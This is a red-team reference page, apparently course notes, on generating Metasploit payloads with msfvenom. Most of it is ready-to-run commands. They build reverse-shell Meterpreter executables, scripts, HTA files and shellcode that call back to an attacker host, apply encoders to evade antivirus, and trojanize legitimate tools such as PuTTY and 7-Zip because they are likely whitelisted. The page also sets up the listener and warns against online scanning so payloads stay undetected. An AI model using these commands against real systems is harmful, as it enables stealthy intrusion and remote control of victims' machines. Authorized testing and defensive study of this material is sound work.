Payloads & msfvenom
Payload Taxonomyβ
Staged vs Stagelessβ
| Type | Naming Convention | How it Works | When to Use |
|---|---|---|---|
| Staged | windows/x64/meterpreter/reverse_https | Small stager connects back, downloads full Meterpreter stage from handler | Smaller file size required |
| Stageless | windows/x64/meterpreter_reverse_https | Full Meterpreter embedded in the payload - no second connection | Preferred - fewer network events, no stage download visible |
The single / before reverse = staged. The _ = stageless. Default to stageless.
Payload Typesβ
| Category | Example | Notes |
|---|---|---|
| Singles | windows/x64/exec | Self-contained, executes one action, no C2 |
| Stagers | windows/x64/meterpreter/reverse_https | Connects back to download stage |
| Stages | windows/x64/meterpreter | Full feature shell, delivered by stager |
| Stageless | windows/x64/meterpreter_reverse_https | Full Meterpreter in one blob |
For CTE: use meterpreter_reverse_https (stageless) for most scenarios.
Common Payloadsβ
| Payload | Use Case |
|---|---|
windows/x64/meterpreter_reverse_https | Windows 64-bit, primary choice |
windows/meterpreter_reverse_https | Windows 32-bit (legacy targets) |
linux/x64/meterpreter_reverse_tcp | Linux 64-bit |
linux/x86/meterpreter_reverse_tcp | Linux 32-bit |
osx/x64/meterpreter_reverse_https | macOS |
windows/x64/shell_reverse_tcp | Dumb shell - no Meterpreter, useful if MSF stage is blocked |
msfvenomβ
msfvenom generates standalone payload files outside of msfconsole. Use it to produce executables, scripts, and documents for delivery via phishing, USB drops, or HTTP serving.
Syntaxβ
msfvenom -p <PAYLOAD> [OPTIONS] -f <FORMAT> -o <OUTPUT_FILE>
Essential Optionsβ
| Flag | Description |
|---|---|
-p | Payload |
LHOST= | Callback IP (your Kali) |
LPORT= | Callback port |
-f | Output format (see below) |
-o | Output file path |
-e | Encoder |
-i | Encoder iterations |
-x | Custom PE template (embed in existing executable) |
-k | Keep template functionality (run original + payload) |
-a | Architecture (x64, x86) |
--platform | Target platform (windows, linux, osx) |
-b | Bad characters to avoid (e.g., '\x00\x0a\x0d') |
--smallest | Generate smallest possible payload |
Output Formatsβ
Windows Executablesβ
# Standalone EXE (64-bit, stageless HTTPS)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f exe -o payload.exe
# 32-bit EXE
msfvenom -p windows/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f exe -o payload_x86.exe
# DLL
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f dll -o payload.dll
# Service EXE (for SCM-based execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f exe-service -o svc_payload.exe
Scriptsβ
# PowerShell (no file - base64 encoded command for in-line execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f ps1 -o payload.ps1
# VBScript
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f vbs -o payload.vbs
# HTA (HTML Application - good for phishing)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f hta-psh -o payload.hta
# JavaScript (for browser/WSH-based execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f js_le -o payload.js
Linux / Otherβ
# ELF binary (Linux)
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<KALI_IP> LPORT=4444 -f elf -o payload.elf
# Python
msfvenom -p python/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f raw -o payload.py
Raw Shellcode (for injection)β
# C array
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f c
# Raw binary
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -f raw -o shellcode.bin
Encodersβ
Encoders transform the payload bytes to avoid static signatures. They are not a reliable AV bypass on their own - modern AV does not rely solely on byte signatures. Use encoders as one layer among several (see 08_obfuscation_and_evasion.md).
# List available encoders
msfvenom -l encoders
# Apply an encoder
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -e x64/xor_dynamic -i 5 -f exe -o payload.exe
Encoder Referenceβ
| Encoder | Architecture | Notes |
|---|---|---|
x64/xor_dynamic | x64 | Good x64 choice - randomized XOR key |
x64/zutto_dekiru | x64 | Robust x64 encoder |
x86/shikata_ga_nai | x86 | Polymorphic, widely known - heavily signatured, avoid for evasion |
x86/xor_dynamic | x86 | Better x86 choice over shikata |
x86/countdown | x86 | Simple, low detection rate |
Multiple iterations (-i) re-encode the payload repeatedly. More iterations = slightly better obfuscation, significantly larger file.
# 8 iterations with xor_dynamic
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 -e x64/xor_dynamic -i 8 -f exe -o payload.exe
Custom PE Templatesβ
Embedding a payload inside an existing legitimate executable makes the resulting file look like the original application in file metadata and imports. The embedded payload runs alongside (or instead of) the original.
# Embed payload inside a legitimate binary (-x = template, -k = keep original behavior)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 \
-x /opt/templates/putty.exe -k \
-f exe -o putty_trojanized.exe
# Without -k: original binary is replaced (payload only, no original execution)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<KALI_IP> LPORT=443 \
-x /opt/templates/7zFM.exe \
-f exe -o 7zip_payload.exe
Not all executables work as templates. 64-bit payloads require 64-bit templates; 32-bit payloads require 32-bit templates. If the resulting binary crashes or doesn't execute, try a different template binary.
Use common sysadmin tools as templates - PuTTY, 7-Zip, Sysinternals utilities. These are expected on endpoints, have known-good file hashes from the vendor, and are likely already whitelisted.
Setting Up the Handlerβ
Every payload needs a listener. Always run the handler before delivering the payload.
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST <KALI_IP>
msf6 > set LPORT 443
msf6 > set ExitOnSession false # Keep handler running after first connection
msf6 > exploit -j # Run as background job
Handler Options Worth Knowingβ
| Option | Value | Purpose |
|---|---|---|
ExitOnSession | false | Keep listening after first session connects |
SessionCommunicationTimeout | 300 | Seconds before idle session is killed (default 300) |
SessionExpirationTimeout | 0 | 0 = never expire sessions |
LHOST | <KALI_IP> | Must match what the payload was built with |
LPORT | 443 | Must match payload |
Verifying a Payload Before Deliveryβ
# Check file type
file payload.exe
# Check detected architecture
objdump -f payload.exe | grep architecture
# Test against VirusTotal alternative (local, no upload)
clamscan payload.exe # ClamAV - low bar, but catches obvious sigs
# String check - confirm LHOST/LPORT are not visible in plaintext
strings payload.exe | grep -i "10\.\|192\.\|443"
Do not upload payloads to VirusTotal or any online scanner before a mission. VT shares samples with AV vendors - your payload will be signatured within hours.